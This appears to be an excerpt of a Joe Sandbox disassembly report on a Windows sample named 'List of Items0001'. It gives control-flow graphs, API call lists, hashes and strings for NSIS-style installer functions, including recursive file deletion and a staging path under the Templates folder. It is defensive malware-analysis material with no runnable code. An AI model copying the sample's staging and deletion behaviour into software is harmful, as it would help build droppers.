                                                Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->148 163 4058f3-40590d SendMessageW * 2 145->163 164 40590f-405912 145->164 149 4059f3-4059f9 147->149 150 405a0f-405a19 147->150 148->147 152 405a34-405a3d call 40462b 149->152 153 4059fb-405a0a ShowWindow * 2 call 4045f9 149->153 154 405a1b-405a21 150->154 155 405a6f-405a73 150->155 167 405a42-405a46 152->167 153->150 160 405a23-405a2f call 40459d 154->160 161 405a49-405a59 ShowWindow 154->161 155->152 158 405a75-405a7b 155->158 158->152 165 405a7d-405a90 SendMessageW 158->165 160->152 168 405a69-405a6a call 40459d 161->168 169 405a5b-405a64 call 4056ca 161->169 163->164 170 405922-405939 call 4045c4 164->170 171 405914-405920 SendMessageW 164->171 172 405b92-405b94 165->172 173 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 165->173 168->155 169->168 182 40593b-40594f ShowWindow 170->182 183 40596f-405990 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405ac3-405ad3 GetWindowRect 173->180 181 405ad6-405aeb TrackPopupMenu 173->181 180->181 181->172 184 405af1-405b08 181->184 185 405951-40595c ShowWindow 182->185 186 40595e 182->186 183->172 187 405996-4059ae SendMessageW * 2 183->187 188 405b0d-405b28 SendMessageW 184->188 189 405964-40596a call 4045f9 185->189 186->189 187->172 188->188 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                • GetClientRect.USER32(?,?), ref: 004058B3
                                                • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                • ShowWindow.USER32(?,00000008), ref: 00405956
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                • ShowWindow.USER32(00000000), ref: 00405A02
                                                • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                • ShowWindow.USER32(00000008), ref: 00405A51
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                • CreatePopupMenu.USER32 ref: 00405A96
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                • EmptyClipboard.USER32 ref: 00405B31
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                • CloseClipboard.USER32 ref: 00405B8C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: H7B${
                                                • API String ID: 590372296-2256286769
                                                • Opcode ID: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                • Opcode Fuzzy Hash: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 506 405d74-405d9a call 40603f 509 405db3-405dba 506->509 510 405d9c-405dae DeleteFileW 506->510 512 405dbc-405dbe 509->512 513 405dcd-405ddd call 406668 509->513 511 405f30-405f34 510->511 514 405dc4-405dc7 512->514 515 405ede-405ee3 512->515 519 405dec-405ded call 405f83 513->519 520 405ddf-405dea lstrcatW 513->520 514->513 514->515 515->511 518 405ee5-405ee8 515->518 521 405ef2-405efa call 40699e 518->521 522 405eea-405ef0 518->522 523 405df2-405df6 519->523 520->523 521->511 530 405efc-405f10 call 405f37 call 405d2c 521->530 522->511 526 405e02-405e08 lstrcatW 523->526 527 405df8-405e00 523->527 529 405e0d-405e29 lstrlenW FindFirstFileW 526->529 527->526 527->529 531 405ed3-405ed7 529->531 532 405e2f-405e37 529->532 546 405f12-405f15 530->546 547 405f28-405f2b call 4056ca 530->547 531->515 534 405ed9 531->534 535 405e57-405e6b call 406668 532->535 536 405e39-405e41 532->536 534->515 548 405e82-405e8d call 405d2c 535->548 549 405e6d-405e75 535->549 538 405e43-405e4b 536->538 539 405eb6-405ec6 FindNextFileW 536->539 538->535 543 405e4d-405e55 538->543 539->532 542 405ecc-405ecd FindClose 539->542 542->531 543->535 543->539 546->522 553 405f17-405f26 call 4056ca call 406428 546->553 547->511 559 405eae-405eb1 call 4056ca 548->559 560 405e8f-405e92 548->560 549->539 550 405e77-405e80 call 405d74 549->550 550->539 553->511 559->539 562 405e94-405ea4 call 4056ca call 406428 560->562 563 405ea6-405eac 560->563 562->539 563->539
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,76693420,76692EE0,00000000), ref: 00405D9D
                                                • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,76693420,76692EE0,00000000), ref: 00405DE5
                                                • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,76693420,76692EE0,00000000), ref: 00405E08
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76693420,76692EE0,00000000), ref: 00405E0E
                                                • FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,76693420,76692EE0,00000000), ref: 00405E1E
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$PWB$\*.*
                                                • API String ID: 2035342205-2468439962
                                                • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0), ref: 004069A9
                                                • FindClose.KERNEL32(00000000), ref: 004069B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 197 4040e9-4040f2 195->197 198 40429c-4042b1 196->198 199 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->199 200 4040f4-404101 SetWindowPos 197->200 201 404107-40410e 197->201 203 4042f1-4042f6 call 404610 198->203 204 4042b3-4042b6 198->204 199->198 200->201 206 404110-40412a ShowWindow 201->206 207 404152-404158 201->207 212 4042fb-404316 203->212 209 4042b8-4042c3 call 401389 204->209 210 4042e9-4042eb 204->210 213 404130-404143 GetWindowLongW 206->213 214 40422b-404239 call 40462b 206->214 215 404171-404174 207->215 216 40415a-40416c DestroyWindow 207->216 209->210 229 4042c5-4042e4 SendMessageW 209->229 210->203 211 404591 210->211 224 404593-40459a 211->224 221 404318-40431a call 40140b 212->221 222 40431f-404325 212->222 213->214 223 404149-40414c ShowWindow 213->223 214->224 227 404176-404182 SetWindowLongW 215->227 228 404187-40418d 215->228 225 40456e-404574 216->225 221->222 233 40432b-404336 222->233 234 40454f-404568 DestroyWindow EndDialog 222->234 223->207 225->211 232 404576-40457c 225->232 227->224 228->214 235 404193-4041a2 GetDlgItem 228->235 229->224 232->211 236 40457e-404587 ShowWindow 232->236 233->234 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 233->237 234->225 238 4041c1-4041c4 235->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 235->239 236->211 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 240 4041c6-4041c7 238->240 241 4041c9-4041cc 238->241 239->211 239->238 243 4041f7-4041fc call 40459d 240->243 244 4041da-4041df 241->244 245 4041ce-4041d4 241->245 243->214 247 404215-404225 SendMessageW 244->247 249 4041e1-4041e7 244->249 245->247 248 4041d6-4041d8 245->248 247->214 248->243 252 4041e9-4041ef call 40140b 249->252 253 4041fe-404207 call 40140b 249->253 264 4041f5 252->264 253->214 262 404209-404213 253->262 262->264 264->243 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->212 286 404464-404466 275->286 286->212 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->211 290 40447e-404484 288->290 289->225 291 4044a9-4044d6 CreateDialogParamW 289->291 290->212 292 40448a 290->292 291->225 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->225
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                • ShowWindow.USER32(?), ref: 00404121
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                • DestroyWindow.USER32 ref: 00404160
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                • GetDlgItem.USER32(?,?), ref: 00404198
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                • EnableWindow.USER32(?,?), ref: 004043C7
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: H7B
                                                • API String ID: 121052019-2300413410
                                                • Opcode ID: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                • Opcode Fuzzy Hash: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 314 403d9d-403dc6 call 403fed call 40603f 304->314 309 403d92-403d98 lstrcatW 305->309 310 403d7c-403d8d call 406536 305->310 309->314 310->309 319 403e58-403e60 call 40603f 314->319 320 403dcc-403dd1 314->320 325 403e62-403e69 call 4066a5 319->325 326 403e6e-403e93 LoadImageW 319->326 320->319 321 403dd7-403dff call 406536 320->321 321->319 328 403e01-403e05 321->328 325->326 330 403f14-403f1c call 40140b 326->330 331 403e95-403ec5 RegisterClassW 326->331 332 403e17-403e23 lstrlenW 328->332 333 403e07-403e14 call 405f64 328->333 344 403f26-403f31 call 403fed 330->344 345 403f1e-403f21 330->345 334 403fe3 331->334 335 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->335 339 403e25-403e33 lstrcmpiW 332->339 340 403e4b-403e53 call 405f37 call 406668 332->340 333->332 338 403fe5-403fec 334->338 335->330 339->340 343 403e35-403e3f GetFileAttributesW 339->343 340->319 347 403e41-403e43 343->347 348 403e45-403e46 call 405f83 343->348 354 403f37-403f51 ShowWindow call 4069c5 344->354 355 403fba-403fbb call 40579d 344->355 345->338 347->340 347->348 348->340 360 403f53-403f58 call 4069c5 354->360 361 403f5d-403f6f GetClassInfoW 354->361 358 403fc0-403fc2 355->358 362 403fc4-403fca 358->362 363 403fdc-403fde call 40140b 358->363 360->361 366 403f71-403f81 GetClassInfoW RegisterClassW 361->366 367 403f87-403faa DialogBoxParamW call 40140b 361->367 362->345 368 403fd0-403fd7 call 40140b 362->368 363->334 366->367 371 403faf-403fb8 call 403c67 367->371 368->345 371->338
                                                APIs
                                                  • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                  • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76693420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D98
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76693420), ref: 00403E18
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22), ref: 00403E7F
                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                • RegisterClassW.USER32(00429200), ref: 00403F81
                                                • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-3960379151
                                                • Opcode ID: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                • Opcode Fuzzy Hash: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
